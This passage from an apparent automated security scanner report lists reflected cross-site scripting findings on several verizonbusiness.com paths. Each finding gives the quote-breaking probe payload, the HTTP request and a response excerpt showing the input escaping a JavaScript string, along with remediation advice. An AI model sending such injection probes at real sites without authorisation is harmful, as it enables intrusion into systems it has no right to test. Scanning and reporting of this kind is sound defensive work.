Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/ipinnovation/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f43"%3b4fcb26528b9 was submitted in the REST URL parameter 1. This input was echoed as 25f43";4fcb26528b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about25f43"%3b4fcb26528b9/ipinnovation/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40636
Date: Wed, 17 Nov 2010 00:52:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about25f43";4fcb26528b9/ipinnovation/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.340. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/ipinnovation/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdbdb'%3b848bffc51b9 was submitted in the REST URL parameter 1. This input was echoed as bdbdb';848bffc51b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutbdbdb'%3b848bffc51b9/ipinnovation/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/aboutbdbdb';848bffc51b9/ipinnovation/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.341. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/ipinnovation/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cb62"%3bad8b6088d was submitted in the REST URL parameter 2. This input was echoed as 3cb62";ad8b6088d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/ipinnovation3cb62"%3bad8b6088d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:06 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47093
Date: Wed, 17 Nov 2010 00:53:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/ipinnovation3cb62";ad8b6088d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.342. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/ipinnovation/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5d44'%3b7e7f0aaf0e9 was submitted in the REST URL parameter 2. This input was echoed as c5d44';7e7f0aaf0e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/ipinnovationc5d44'%3b7e7f0aaf0e9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:24 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47097
Date: Wed, 17 Nov 2010 00:53:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/ipinnovationc5d44';7e7f0aaf0e9/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.343. http://www.verizonbusiness.com/about/network/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/network/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1eaf4"%3b8654271e773 was submitted in the REST URL parameter 1. This input was echoed as 1eaf4";8654271e773 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about1eaf4"%3b8654271e773/network/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40626
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about1eaf4";8654271e773/network/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.344. http://www.verizonbusiness.com/about/network/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/network/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e68d'%3b9f6784fa5b0 was submitted in the REST URL parameter 1. This input was echoed as 3e68d';9f6784fa5b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about3e68d'%3b9f6784fa5b0/network/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40628
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about3e68d';9f6784fa5b0/network/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.345. http://www.verizonbusiness.com/about/network/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/network/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1eab'%3b1886eb71e1c was submitted in the REST URL parameter 2. This input was echoed as d1eab';1886eb71e1c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/networkd1eab'%3b1886eb71e1c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:11 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47087
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/networkd1eab';1886eb71e1c/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.346. http://www.verizonbusiness.com/about/network/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/network/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0ec6"%3b641517e27dc was submitted in the REST URL parameter 2. This input was echoed as e0ec6";641517e27dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/networke0ec6"%3b641517e27dc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47087
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/networke0ec6";641517e27dc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.347. http://www.verizonbusiness.com/about/news/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 846e7'%3b156398fedc was submitted in the REST URL parameter 1. This input was echoed as 846e7';156398fedc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about846e7'%3b156398fedc/news/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40618
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about846e7';156398fedc/news/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.348. http://www.verizonbusiness.com/about/news/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1efb"%3b84767a39647 was submitted in the REST URL parameter 1. This input was echoed as d1efb";84767a39647 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutd1efb"%3b84767a39647/news/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:49 GMT
Content-Type: text/html
Content-Length: 40620
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutd1efb";84767a39647/news/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.349. http://www.verizonbusiness.com/about/news/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2e88"%3b7d712ef7635 was submitted in the REST URL parameter 2. This input was echoed as f2e88";7d712ef7635 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsf2e88"%3b7d712ef7635/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47081
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newsf2e88";7d712ef7635/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.350. http://www.verizonbusiness.com/about/news/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62f59'%3b76825451fb8 was submitted in the REST URL parameter 2. This input was echoed as 62f59';76825451fb8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news62f59'%3b76825451fb8/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:09 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47083
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news62f59';76825451fb8/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.351. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/fast/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef28e'%3ba87bcb04fba was submitted in the REST URL parameter 1. This input was echoed as ef28e';a87bcb04fba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutef28e'%3ba87bcb04fba/news/fast/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/aboutef28e';a87bcb04fba/news/fast/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.352. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/fast/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41438"%3b78c1125432 was submitted in the REST URL parameter 1. This input was echoed as 41438";78c1125432 in the application's response.

